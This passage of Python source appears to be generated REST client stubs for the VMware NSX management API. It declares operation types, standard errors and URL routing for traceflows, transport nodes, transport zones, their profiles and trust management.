                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
                'com.vmware.vapi.std.errors.internal_server_error':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
                'com.vmware.vapi.std.errors.unauthorized':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
                'com.vmware.vapi.std.errors.not_found':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
            }

        # -- create: POST a traceflow request --
        create_input_type = type.StructType('operation-input', {
            'traceflow_request': type.ReferenceType('com.vmware.nsx.model_client', 'TraceflowRequest'),
        })
        create_rest_metadata = OperationRestMetadata(
            http_method='POST',
            url_template='/api/v1/traceflows',
            request_body_parameter='traceflow_request',
            path_variables={},
            query_parameters={},
            content_type='application/json'
        )
        # -- delete: remove a traceflow round by id --
        delete_input_type = type.StructType('operation-input', {
            'traceflow_id': type.StringType(),
        })
        delete_rest_metadata = OperationRestMetadata(
            http_method='DELETE',
            url_template='/api/v1/traceflows/{traceflow-id}',
            path_variables={'traceflow_id': 'traceflow-id'},
            query_parameters={},
            content_type='application/json'
        )
        # -- get: fetch one traceflow by id --
        get_input_type = type.StructType('operation-input', {
            'traceflow_id': type.StringType(),
        })
        get_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/traceflows/{traceflow-id}',
            path_variables={'traceflow_id': 'traceflow-id'},
            query_parameters={},
            content_type='application/json'
        )
        # -- list: paged/filtered listing of traceflows --
        list_input_type = type.StructType('operation-input', {
            'cursor': type.OptionalType(type.StringType()),
            'included_fields': type.OptionalType(type.StringType()),
            'lport_id': type.OptionalType(type.StringType()),
            'page_size': type.OptionalType(type.IntegerType()),
            'sort_ascending': type.OptionalType(type.BooleanType()),
            'sort_by': type.OptionalType(type.StringType()),
        })
        list_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/traceflows',
            path_variables={},
            query_parameters={
                'cursor': 'cursor',
                'included_fields': 'included_fields',
                'lport_id': 'lport_id',
                'page_size': 'page_size',
                'sort_ascending': 'sort_ascending',
                'sort_by': 'sort_by',
            },
            content_type='application/json'
        )
        operations = {
            'create': {
                'input_type': create_input_type,
                'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'Traceflow'),
                'errors': _standard_errors(),
                'input_value_validator_list': [HasFieldsOfValidator()],
                'output_validator_list': [],
                'task_type': TaskType.NONE,
            },
            'delete': {
                'input_type': delete_input_type,
                'output_type': type.VoidType(),
                'errors': _standard_errors(),
                'input_value_validator_list': [],
                'output_validator_list': [],
                'task_type': TaskType.NONE,
            },
            'get': {
                'input_type': get_input_type,
                'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'Traceflow'),
                'errors': _standard_errors(),
                'input_value_validator_list': [],
                'output_validator_list': [],
                'task_type': TaskType.NONE,
            },
            'list': {
                'input_type': list_input_type,
                'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'TraceflowListResult'),
                'errors': _standard_errors(),
                'input_value_validator_list': [],
                'output_validator_list': [],
                'task_type': TaskType.NONE,
            },
        }
        rest_metadata = {
            'create': create_rest_metadata,
            'delete': delete_rest_metadata,
            'get': get_rest_metadata,
            'list': list_rest_metadata,
        }
        ApiInterfaceStub.__init__(
            self, iface_name='com.vmware.nsx.traceflows',
            config=config, operations=operations, rest_metadata=rest_metadata,
            is_vapi_rest=False)
class _TransportNodeCollectionsStub(ApiInterfaceStub):
    def __init__(self, config):
        """Build the REST stub for ``com.vmware.nsx.transport_node_collections``.

        Declares input/output types, error maps and REST metadata for
        create/delete/get/list/update and delegates to
        :class:`ApiInterfaceStub`.  No operation on this interface uses
        value validators.
        """
        def _standard_errors():
            # Every operation declares the same five standard vAPI errors;
            # build a fresh dict per operation.
            return {
                'com.vmware.vapi.std.errors.service_unavailable':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
                'com.vmware.vapi.std.errors.invalid_request':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
                'com.vmware.vapi.std.errors.internal_server_error':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
                'com.vmware.vapi.std.errors.unauthorized':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
                'com.vmware.vapi.std.errors.not_found':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
            }

        # -- create: POST a new transport node collection --
        create_input_type = type.StructType('operation-input', {
            'transport_node_collection': type.ReferenceType('com.vmware.nsx.model_client', 'TransportNodeCollection'),
        })
        create_rest_metadata = OperationRestMetadata(
            http_method='POST',
            url_template='/api/v1/transport-node-collections',
            request_body_parameter='transport_node_collection',
            path_variables={},
            query_parameters={},
            content_type='application/json'
        )
        # -- delete: remove a collection by id --
        delete_input_type = type.StructType('operation-input', {
            'transport_node_collection_id': type.StringType(),
        })
        delete_rest_metadata = OperationRestMetadata(
            http_method='DELETE',
            url_template='/api/v1/transport-node-collections/{transport-node-collection-id}',
            path_variables={'transport_node_collection_id': 'transport-node-collection-id'},
            query_parameters={},
            content_type='application/json'
        )
        # -- get: fetch one collection by id --
        get_input_type = type.StructType('operation-input', {
            'transport_node_collection_id': type.StringType(),
        })
        get_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/transport-node-collections/{transport-node-collection-id}',
            path_variables={'transport_node_collection_id': 'transport-node-collection-id'},
            query_parameters={},
            content_type='application/json'
        )
        # -- list: fetch all collections (no paging/filter parameters) --
        list_input_type = type.StructType('operation-input', {})
        list_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/transport-node-collections',
            path_variables={},
            query_parameters={},
            content_type='application/json'
        )
        # -- update: PUT a full replacement of an existing collection --
        update_input_type = type.StructType('operation-input', {
            'transport_node_collection_id': type.StringType(),
            'transport_node_collection': type.ReferenceType('com.vmware.nsx.model_client', 'TransportNodeCollection'),
        })
        update_rest_metadata = OperationRestMetadata(
            http_method='PUT',
            url_template='/api/v1/transport-node-collections/{transport-node-collection-id}',
            request_body_parameter='transport_node_collection',
            path_variables={'transport_node_collection_id': 'transport-node-collection-id'},
            query_parameters={},
            content_type='application/json'
        )
        operations = {
            'create': {
                'input_type': create_input_type,
                'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'TransportNodeCollection'),
                'errors': _standard_errors(),
                'input_value_validator_list': [],
                'output_validator_list': [],
                'task_type': TaskType.NONE,
            },
            'delete': {
                'input_type': delete_input_type,
                'output_type': type.VoidType(),
                'errors': _standard_errors(),
                'input_value_validator_list': [],
                'output_validator_list': [],
                'task_type': TaskType.NONE,
            },
            'get': {
                'input_type': get_input_type,
                'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'TransportNodeCollection'),
                'errors': _standard_errors(),
                'input_value_validator_list': [],
                'output_validator_list': [],
                'task_type': TaskType.NONE,
            },
            'list': {
                'input_type': list_input_type,
                'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'TransportNodeCollectionListResult'),
                'errors': _standard_errors(),
                'input_value_validator_list': [],
                'output_validator_list': [],
                'task_type': TaskType.NONE,
            },
            'update': {
                'input_type': update_input_type,
                'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'TransportNodeCollection'),
                'errors': _standard_errors(),
                'input_value_validator_list': [],
                'output_validator_list': [],
                'task_type': TaskType.NONE,
            },
        }
        rest_metadata = {
            'create': create_rest_metadata,
            'delete': delete_rest_metadata,
            'get': get_rest_metadata,
            'list': list_rest_metadata,
            'update': update_rest_metadata,
        }
        ApiInterfaceStub.__init__(
            self, iface_name='com.vmware.nsx.transport_node_collections',
            config=config, operations=operations, rest_metadata=rest_metadata,
            is_vapi_rest=False)
class _TransportNodeProfilesStub(ApiInterfaceStub):
    def __init__(self, config):
        """Build the REST stub for ``com.vmware.nsx.transport_node_profiles``.

        Declares input/output types, error maps, validators and REST
        metadata for create/delete/get/list/update and delegates to
        :class:`ApiInterfaceStub`.
        """
        def _standard_errors():
            # Every operation declares the same five standard vAPI errors;
            # build a fresh dict per operation.
            return {
                'com.vmware.vapi.std.errors.service_unavailable':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
                'com.vmware.vapi.std.errors.invalid_request':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
                'com.vmware.vapi.std.errors.internal_server_error':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
                'com.vmware.vapi.std.errors.unauthorized':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
                'com.vmware.vapi.std.errors.not_found':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
            }

        def _profile_ref():
            # The request/response payload type shared by create/get/update.
            return type.ReferenceType('com.vmware.nsx.model_client', 'TransportNodeProfile')

        # -- create: POST a new transport node profile --
        create_input_type = type.StructType('operation-input', {
            'transport_node_profile': _profile_ref(),
        })
        create_rest_metadata = OperationRestMetadata(
            http_method='POST',
            url_template='/api/v1/transport-node-profiles',
            request_body_parameter='transport_node_profile',
            path_variables={},
            query_parameters={},
            content_type='application/json'
        )
        # -- delete: remove a profile by id --
        delete_input_type = type.StructType('operation-input', {
            'transport_node_profile_id': type.StringType(),
        })
        delete_rest_metadata = OperationRestMetadata(
            http_method='DELETE',
            url_template='/api/v1/transport-node-profiles/{transport-node-profile-id}',
            path_variables={'transport_node_profile_id': 'transport-node-profile-id'},
            query_parameters={},
            content_type='application/json'
        )
        # -- get: fetch one profile by id --
        get_input_type = type.StructType('operation-input', {
            'transport_node_profile_id': type.StringType(),
        })
        get_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/transport-node-profiles/{transport-node-profile-id}',
            path_variables={'transport_node_profile_id': 'transport-node-profile-id'},
            query_parameters={},
            content_type='application/json'
        )
        # -- list: paged listing of profiles --
        list_input_type = type.StructType('operation-input', {
            'cursor': type.OptionalType(type.StringType()),
            'included_fields': type.OptionalType(type.StringType()),
            'page_size': type.OptionalType(type.IntegerType()),
            'sort_ascending': type.OptionalType(type.BooleanType()),
            'sort_by': type.OptionalType(type.StringType()),
        })
        list_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/transport-node-profiles',
            path_variables={},
            query_parameters={
                'cursor': 'cursor',
                'included_fields': 'included_fields',
                'page_size': 'page_size',
                'sort_ascending': 'sort_ascending',
                'sort_by': 'sort_by',
            },
            content_type='application/json'
        )
        # -- update: PUT a replacement profile; the optional parameters are
        #    sent as query parameters alongside the body --
        update_input_type = type.StructType('operation-input', {
            'transport_node_profile_id': type.StringType(),
            'transport_node_profile': _profile_ref(),
            'esx_mgmt_if_migration_dest': type.OptionalType(type.StringType()),
            'if_id': type.OptionalType(type.StringType()),
            'ping_ip': type.OptionalType(type.StringType()),
            'vnic': type.OptionalType(type.StringType()),
            'vnic_migration_dest': type.OptionalType(type.StringType()),
        })
        update_rest_metadata = OperationRestMetadata(
            http_method='PUT',
            url_template='/api/v1/transport-node-profiles/{transport-node-profile-id}',
            request_body_parameter='transport_node_profile',
            path_variables={'transport_node_profile_id': 'transport-node-profile-id'},
            query_parameters={
                'esx_mgmt_if_migration_dest': 'esx_mgmt_if_migration_dest',
                'if_id': 'if_id',
                'ping_ip': 'ping_ip',
                'vnic': 'vnic',
                'vnic_migration_dest': 'vnic_migration_dest',
            },
            content_type='application/json'
        )
        operations = {
            'create': {
                'input_type': create_input_type,
                'output_type': _profile_ref(),
                'errors': _standard_errors(),
                'input_value_validator_list': [HasFieldsOfValidator()],
                'output_validator_list': [HasFieldsOfValidator()],
                'task_type': TaskType.NONE,
            },
            'delete': {
                'input_type': delete_input_type,
                'output_type': type.VoidType(),
                'errors': _standard_errors(),
                'input_value_validator_list': [],
                'output_validator_list': [],
                'task_type': TaskType.NONE,
            },
            'get': {
                'input_type': get_input_type,
                'output_type': _profile_ref(),
                'errors': _standard_errors(),
                'input_value_validator_list': [],
                'output_validator_list': [HasFieldsOfValidator()],
                'task_type': TaskType.NONE,
            },
            'list': {
                'input_type': list_input_type,
                'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'TransportNodeProfileListResult'),
                'errors': _standard_errors(),
                'input_value_validator_list': [],
                'output_validator_list': [HasFieldsOfValidator()],
                'task_type': TaskType.NONE,
            },
            'update': {
                'input_type': update_input_type,
                'output_type': _profile_ref(),
                'errors': _standard_errors(),
                'input_value_validator_list': [HasFieldsOfValidator()],
                'output_validator_list': [HasFieldsOfValidator()],
                'task_type': TaskType.NONE,
            },
        }
        rest_metadata = {
            'create': create_rest_metadata,
            'delete': delete_rest_metadata,
            'get': get_rest_metadata,
            'list': list_rest_metadata,
            'update': update_rest_metadata,
        }
        ApiInterfaceStub.__init__(
            self, iface_name='com.vmware.nsx.transport_node_profiles',
            config=config, operations=operations, rest_metadata=rest_metadata,
            is_vapi_rest=False)
class _TransportNodesStub(ApiInterfaceStub):
    """Generated REST stub for the ``com.vmware.nsx.transport_nodes``
    interface.

    Declares, for every operation, the vAPI input/output types, the
    reportable standard errors, the value validators and the REST routing
    metadata, then registers the whole table with
    :class:`ApiInterfaceStub`.
    """
    def __init__(self, config):
        """Build the operation and REST-metadata tables.

        :param config: vAPI stub configuration forwarded verbatim to
            :meth:`ApiInterfaceStub.__init__`.
        """
        # Explicit id -> binding-class map for the vAPI standard errors
        # used by this interface.
        error_classes = {
            'timed_out': 'TimedOut',
            'service_unavailable': 'ServiceUnavailable',
            'invalid_request': 'InvalidRequest',
            'internal_server_error': 'InternalServerError',
            'unauthorized': 'Unauthorized',
            'not_found': 'NotFound',
        }

        def model_ref(name):
            # Lazily-resolved reference to an NSX model binding type.
            return type.ReferenceType('com.vmware.nsx.model_client', name)

        def err_dict(*error_ids):
            # Fresh dict mapping fully-qualified error ids to their
            # binding types, in the order given.
            return {
                'com.vmware.vapi.std.errors.' + eid:
                    type.ReferenceType('com.vmware.vapi.std.errors_client',
                                       error_classes[eid])
                for eid in error_ids
            }

        # Error sets: every operation reports the five standard errors;
        # the node-proxy operations additionally report TimedOut (first).
        std_errors = ('service_unavailable', 'invalid_request',
                      'internal_server_error', 'unauthorized', 'not_found')
        proxy_errors = ('timed_out',) + std_errors

        def opt(base_type):
            return type.OptionalType(base_type)

        def op(fields, output, errors=std_errors,
               validate_input=False, validate_output=False):
            # One operation table entry. ``validate_*`` toggles the
            # HasFieldsOfValidator used on struct-valued payloads.
            return {
                'input_type': type.StructType('operation-input', fields),
                'output_type': output,
                'errors': err_dict(*errors),
                'input_value_validator_list':
                    [HasFieldsOfValidator()] if validate_input else [],
                'output_validator_list':
                    [HasFieldsOfValidator()] if validate_output else [],
                'task_type': TaskType.NONE,
            }

        def rest(method, template, body=None, path=(), query=()):
            # REST routing metadata. Path variables map the python-style
            # parameter name to its dashed form in the URL template;
            # query parameters map to themselves.
            extra = {} if body is None else {'request_body_parameter': body}
            return OperationRestMetadata(
                http_method=method,
                url_template=template,
                path_variables={name: name.replace('_', '-')
                                for name in path},
                query_parameters={name: name for name in query},
                content_type='application/json',
                **extra)

        # Common field sets -------------------------------------------------
        def node_id_field():
            return {'transport_node_id': type.StringType()}

        def proxy_fields():
            return {
                'target_node_id': type.StringType(),
                'target_uri': type.StringType(),
            }

        operations = {
            'create': op(
                {'transport_node': model_ref('TransportNode')},
                model_ref('TransportNode'),
                validate_input=True, validate_output=True),
            'delete': op(
                {'transport_node_id': type.StringType(),
                 'force': opt(type.BooleanType()),
                 'unprepare_host': opt(type.BooleanType())},
                type.VoidType()),
            'deleteontransportnode': op(
                proxy_fields(), type.VoidType(), errors=proxy_errors),
            'disableflowcache': op(node_id_field(), type.VoidType()),
            'enableflowcache': op(node_id_field(), type.VoidType()),
            'get': op(
                node_id_field(), model_ref('TransportNode'),
                validate_output=True),
            'getontransportnode': op(
                proxy_fields(), type.VoidType(), errors=proxy_errors),
            'list': op(
                {'cursor': opt(type.StringType()),
                 'in_maintenance_mode': opt(type.BooleanType()),
                 'included_fields': opt(type.StringType()),
                 'node_id': opt(type.StringType()),
                 'node_ip': opt(type.StringType()),
                 'node_types': opt(type.StringType()),
                 'page_size': opt(type.IntegerType()),
                 'sort_ascending': opt(type.BooleanType()),
                 'sort_by': opt(type.StringType()),
                 'transport_zone_id': opt(type.StringType())},
                model_ref('TransportNodeListResult'),
                validate_output=True),
            'postontransportnode': op(
                proxy_fields(), type.VoidType(), errors=proxy_errors),
            'putontransportnode': op(
                proxy_fields(), type.VoidType(), errors=proxy_errors),
            'refreshnodeconfiguration': op(node_id_field(), type.VoidType()),
            'restartinventorysync': op(node_id_field(), type.VoidType()),
            'restoreclusterconfig': op(node_id_field(), type.VoidType()),
            # NOTE(review): upstream API spells this parameter without the
            # inner underscore; keep it — it is caller-visible.
            'resynchostconfig': op(
                {'transportnode_id': type.StringType()}, type.VoidType()),
            'update': op(
                {'transport_node_id': type.StringType(),
                 'transport_node': model_ref('TransportNode'),
                 'esx_mgmt_if_migration_dest': opt(type.StringType()),
                 'if_id': opt(type.StringType()),
                 'ping_ip': opt(type.StringType()),
                 'vnic': opt(type.StringType()),
                 'vnic_migration_dest': opt(type.StringType())},
                model_ref('TransportNode'),
                validate_input=True, validate_output=True),
            'updatemaintenancemode': op(
                {'transportnode_id': type.StringType(),
                 'action': opt(type.StringType())},
                type.VoidType()),
        }

        # URL fragments shared by several routes.
        base = '/api/v1/transport-nodes'
        by_node = base + '/{transport-node-id}'
        proxy = base + '/{target-node-id}/{target-uri}'
        proxy_path = ('target_node_id', 'target_uri')

        rest_metadata = {
            'create': rest('POST', base, body='transport_node'),
            'delete': rest('DELETE', by_node,
                           path=('transport_node_id',),
                           query=('force', 'unprepare_host')),
            'deleteontransportnode': rest('DELETE', proxy, path=proxy_path),
            'disableflowcache': rest(
                'POST', by_node + '?action=disable_flow_cache',
                path=('transport_node_id',)),
            'enableflowcache': rest(
                'POST', by_node + '?action=enable_flow_cache',
                path=('transport_node_id',)),
            'get': rest('GET', by_node, path=('transport_node_id',)),
            'getontransportnode': rest('GET', proxy, path=proxy_path),
            'list': rest('GET', base, query=(
                'cursor', 'in_maintenance_mode', 'included_fields',
                'node_id', 'node_ip', 'node_types', 'page_size',
                'sort_ascending', 'sort_by', 'transport_zone_id')),
            'postontransportnode': rest('POST', proxy, path=proxy_path),
            'putontransportnode': rest('PUT', proxy, path=proxy_path),
            'refreshnodeconfiguration': rest(
                'POST',
                by_node + '?action=refresh_node_configuration'
                          '&resource_type=EdgeNode',
                path=('transport_node_id',)),
            'restartinventorysync': rest(
                'POST', by_node + '?action=restart_inventory_sync',
                path=('transport_node_id',)),
            'restoreclusterconfig': rest(
                'POST', by_node + '?action=restore_cluster_config',
                path=('transport_node_id',)),
            'resynchostconfig': rest(
                'POST',
                base + '/{transportnode-id}?action=resync_host_config',
                path=('transportnode_id',)),
            'update': rest('PUT', by_node, body='transport_node',
                           path=('transport_node_id',),
                           query=('esx_mgmt_if_migration_dest', 'if_id',
                                  'ping_ip', 'vnic', 'vnic_migration_dest')),
            'updatemaintenancemode': rest(
                'POST', base + '/{transportnode-id}',
                path=('transportnode_id',), query=('action',)),
        }

        ApiInterfaceStub.__init__(
            self, iface_name='com.vmware.nsx.transport_nodes',
            config=config, operations=operations,
            rest_metadata=rest_metadata, is_vapi_rest=False)
class _TransportZonesStub(ApiInterfaceStub):
    """Generated REST stub for the ``com.vmware.nsx.transport_zones``
    interface (create / delete / get / list / update).

    Declares each operation's vAPI input/output types, reportable
    standard errors and REST routing metadata, then registers the table
    with :class:`ApiInterfaceStub`.
    """
    def __init__(self, config):
        """Build the operation and REST-metadata tables.

        :param config: vAPI stub configuration forwarded verbatim to
            :meth:`ApiInterfaceStub.__init__`.
        """
        def zone_ref(name):
            # Lazily-resolved reference to an NSX model binding type.
            return type.ReferenceType('com.vmware.nsx.model_client', name)

        # Every operation of this interface reports the same five vAPI
        # standard errors, in this order.
        error_names = (
            ('service_unavailable', 'ServiceUnavailable'),
            ('invalid_request', 'InvalidRequest'),
            ('internal_server_error', 'InternalServerError'),
            ('unauthorized', 'Unauthorized'),
            ('not_found', 'NotFound'),
        )

        def std_errors():
            # Fresh error dict: fully-qualified id -> binding type.
            return {
                'com.vmware.vapi.std.errors.' + key:
                    type.ReferenceType('com.vmware.vapi.std.errors_client',
                                       cls)
                for key, cls in error_names
            }

        def opt_str():
            return type.OptionalType(type.StringType())

        def opt_bool():
            return type.OptionalType(type.BooleanType())

        def op(fields, output):
            # One operation table entry; no value validators are used on
            # this interface.
            return {
                'input_type': type.StructType('operation-input', fields),
                'output_type': output,
                'errors': std_errors(),
                'input_value_validator_list': [],
                'output_validator_list': [],
                'task_type': TaskType.NONE,
            }

        operations = {
            'create': op({'transport_zone': zone_ref('TransportZone')},
                         zone_ref('TransportZone')),
            'delete': op({'zone_id': type.StringType()}, type.VoidType()),
            'get': op({'zone_id': type.StringType()},
                      zone_ref('TransportZone')),
            'list': op(
                {'cursor': opt_str(),
                 'included_fields': opt_str(),
                 'is_default': opt_bool(),
                 'page_size': type.OptionalType(type.IntegerType()),
                 'sort_ascending': opt_bool(),
                 'sort_by': opt_str(),
                 'transport_type': opt_str(),
                 'uplink_teaming_policy_name': opt_str()},
                zone_ref('TransportZoneListResult')),
            'update': op({'zone_id': type.StringType(),
                          'transport_zone': zone_ref('TransportZone')},
                         zone_ref('TransportZone')),
        }

        def rest(method, template, body=None, path=(), query=()):
            # REST routing metadata; path variables map the python-style
            # name to its dashed form, query parameters map to themselves.
            extra = {} if body is None else {'request_body_parameter': body}
            return OperationRestMetadata(
                http_method=method,
                url_template=template,
                path_variables={name: name.replace('_', '-')
                                for name in path},
                query_parameters={name: name for name in query},
                content_type='application/json',
                **extra)

        collection = '/api/v1/transport-zones'
        item = collection + '/{zone-id}'
        rest_metadata = {
            'create': rest('POST', collection, body='transport_zone'),
            'delete': rest('DELETE', item, path=('zone_id',)),
            'get': rest('GET', item, path=('zone_id',)),
            'list': rest('GET', collection, query=(
                'cursor', 'included_fields', 'is_default', 'page_size',
                'sort_ascending', 'sort_by', 'transport_type',
                'uplink_teaming_policy_name')),
            'update': rest('PUT', item, body='transport_zone',
                           path=('zone_id',)),
        }

        ApiInterfaceStub.__init__(
            self, iface_name='com.vmware.nsx.transport_zones',
            config=config, operations=operations,
            rest_metadata=rest_metadata, is_vapi_rest=False)
class _TransportzoneProfilesStub(ApiInterfaceStub):
    """REST stub for the com.vmware.nsx.transportzone_profiles service
    (create/read/update/delete/list of TransportZoneProfile resources).
    """
    def __init__(self, config):
        # Every operation on this interface advertises the same five
        # standard vAPI errors; build a fresh dict per operation so each
        # op owns its own mapping, as the generated code did.
        def std_errors():
            return {
                'com.vmware.vapi.std.errors.service_unavailable':
                    type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
                'com.vmware.vapi.std.errors.invalid_request':
                    type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
                'com.vmware.vapi.std.errors.internal_server_error':
                    type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
                'com.vmware.vapi.std.errors.unauthorized':
                    type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
                'com.vmware.vapi.std.errors.not_found':
                    type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
            }

        # Polymorphic TransportZoneProfile payload: used as the request body
        # of create/update and the response body of create/get/update.
        def profile_type():
            return type.DynamicStructType(
                'vmware.vapi.dynamic_struct', {}, VapiStruct,
                [type.ReferenceType('com.vmware.nsx.model_client', 'TransportZoneProfile')])

        # -- create ------------------------------------------------------
        create_input_type = type.StructType('operation-input', {
            'transport_zone_profile': profile_type(),
        })
        create_error_dict = std_errors()
        create_input_value_validator_list = [HasFieldsOfValidator()]
        create_output_validator_list = [HasFieldsOfValidator()]
        create_rest_metadata = OperationRestMetadata(
            http_method='POST',
            url_template='/api/v1/transportzone-profiles',
            request_body_parameter='transport_zone_profile',
            path_variables={},
            query_parameters={},
            content_type='application/json')

        # -- delete ------------------------------------------------------
        delete_input_type = type.StructType('operation-input', {
            'transportzone_profile_id': type.StringType(),
        })
        delete_error_dict = std_errors()
        delete_input_value_validator_list = []
        delete_output_validator_list = []
        delete_rest_metadata = OperationRestMetadata(
            http_method='DELETE',
            url_template='/api/v1/transportzone-profiles/{transportzone-profile-id}',
            path_variables={'transportzone_profile_id': 'transportzone-profile-id'},
            query_parameters={},
            content_type='application/json')

        # -- get ---------------------------------------------------------
        get_input_type = type.StructType('operation-input', {
            'transportzone_profile_id': type.StringType(),
        })
        get_error_dict = std_errors()
        get_input_value_validator_list = []
        get_output_validator_list = [HasFieldsOfValidator()]
        get_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/transportzone-profiles/{transportzone-profile-id}',
            path_variables={'transportzone_profile_id': 'transportzone-profile-id'},
            query_parameters={},
            content_type='application/json')

        # -- list --------------------------------------------------------
        # Optional paging/filtering parameters, mapped 1:1 onto query-string
        # parameters of the same name.
        list_input_type = type.StructType('operation-input', {
            'cursor': type.OptionalType(type.StringType()),
            'include_system_owned': type.OptionalType(type.BooleanType()),
            'included_fields': type.OptionalType(type.StringType()),
            'page_size': type.OptionalType(type.IntegerType()),
            'resource_type': type.OptionalType(type.StringType()),
            'sort_ascending': type.OptionalType(type.BooleanType()),
            'sort_by': type.OptionalType(type.StringType()),
        })
        list_error_dict = std_errors()
        list_input_value_validator_list = []
        list_output_validator_list = [HasFieldsOfValidator()]
        list_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/transportzone-profiles',
            path_variables={},
            query_parameters={
                'cursor': 'cursor',
                'include_system_owned': 'include_system_owned',
                'included_fields': 'included_fields',
                'page_size': 'page_size',
                'resource_type': 'resource_type',
                'sort_ascending': 'sort_ascending',
                'sort_by': 'sort_by',
            },
            content_type='application/json')

        # -- update ------------------------------------------------------
        update_input_type = type.StructType('operation-input', {
            'transportzone_profile_id': type.StringType(),
            'transport_zone_profile': profile_type(),
        })
        update_error_dict = std_errors()
        update_input_value_validator_list = [HasFieldsOfValidator()]
        update_output_validator_list = [HasFieldsOfValidator()]
        update_rest_metadata = OperationRestMetadata(
            http_method='PUT',
            url_template='/api/v1/transportzone-profiles/{transportzone-profile-id}',
            request_body_parameter='transport_zone_profile',
            path_variables={'transportzone_profile_id': 'transportzone-profile-id'},
            query_parameters={},
            content_type='application/json')

        operations = {
            'create': {
                'input_type': create_input_type,
                'output_type': profile_type(),
                'errors': create_error_dict,
                'input_value_validator_list': create_input_value_validator_list,
                'output_validator_list': create_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'delete': {
                'input_type': delete_input_type,
                'output_type': type.VoidType(),
                'errors': delete_error_dict,
                'input_value_validator_list': delete_input_value_validator_list,
                'output_validator_list': delete_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'get': {
                'input_type': get_input_type,
                'output_type': profile_type(),
                'errors': get_error_dict,
                'input_value_validator_list': get_input_value_validator_list,
                'output_validator_list': get_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'list': {
                'input_type': list_input_type,
                'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'TransportZoneProfileListResult'),
                'errors': list_error_dict,
                'input_value_validator_list': list_input_value_validator_list,
                'output_validator_list': list_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'update': {
                'input_type': update_input_type,
                'output_type': profile_type(),
                'errors': update_error_dict,
                'input_value_validator_list': update_input_value_validator_list,
                'output_validator_list': update_output_validator_list,
                'task_type': TaskType.NONE,
            },
        }
        rest_metadata = {
            'create': create_rest_metadata,
            'delete': delete_rest_metadata,
            'get': get_rest_metadata,
            'list': list_rest_metadata,
            'update': update_rest_metadata,
        }
        ApiInterfaceStub.__init__(
            self, iface_name='com.vmware.nsx.transportzone_profiles',
            config=config, operations=operations, rest_metadata=rest_metadata,
            is_vapi_rest=False)
class _TrustManagementStub(ApiInterfaceStub):
    """REST stub for com.vmware.nsx.trust_management.

    Exposes a single read-only ``get`` operation returning the service's
    TrustManagementData.
    """
    def __init__(self, config):
        get_input_type = type.StructType('operation-input', {})
        # The standard five vAPI errors this operation may report.
        errors_mod = 'com.vmware.vapi.std.errors_client'
        get_error_dict = {
            'com.vmware.vapi.std.errors.' + suffix:
                type.ReferenceType(errors_mod, cls_name)
            for suffix, cls_name in (
                ('service_unavailable', 'ServiceUnavailable'),
                ('invalid_request', 'InvalidRequest'),
                ('internal_server_error', 'InternalServerError'),
                ('unauthorized', 'Unauthorized'),
                ('not_found', 'NotFound'),
            )
        }
        get_input_value_validator_list = []
        get_output_validator_list = []
        get_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/trust-management',
            path_variables={},
            query_parameters={},
            content_type='application/json')
        operations = {
            'get': {
                'input_type': get_input_type,
                'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'TrustManagementData'),
                'errors': get_error_dict,
                'input_value_validator_list': get_input_value_validator_list,
                'output_validator_list': get_output_validator_list,
                'task_type': TaskType.NONE,
            },
        }
        rest_metadata = {'get': get_rest_metadata}
        ApiInterfaceStub.__init__(
            self, iface_name='com.vmware.nsx.trust_management',
            config=config, operations=operations, rest_metadata=rest_metadata,
            is_vapi_rest=False)
class _UiViewsStub(ApiInterfaceStub):
    """REST stub for com.vmware.nsx.ui_views (dashboard View CRUD).

    ``get`` lists views (optionally filtered); ``get_0`` is the
    by-id overload, disambiguated by the generated ``_0`` suffix.
    """
    def __init__(self, config):
        # Standard five vAPI errors shared by every ui-views operation;
        # a fresh dict is produced per operation.
        def std_errors():
            return {
                'com.vmware.vapi.std.errors.service_unavailable':
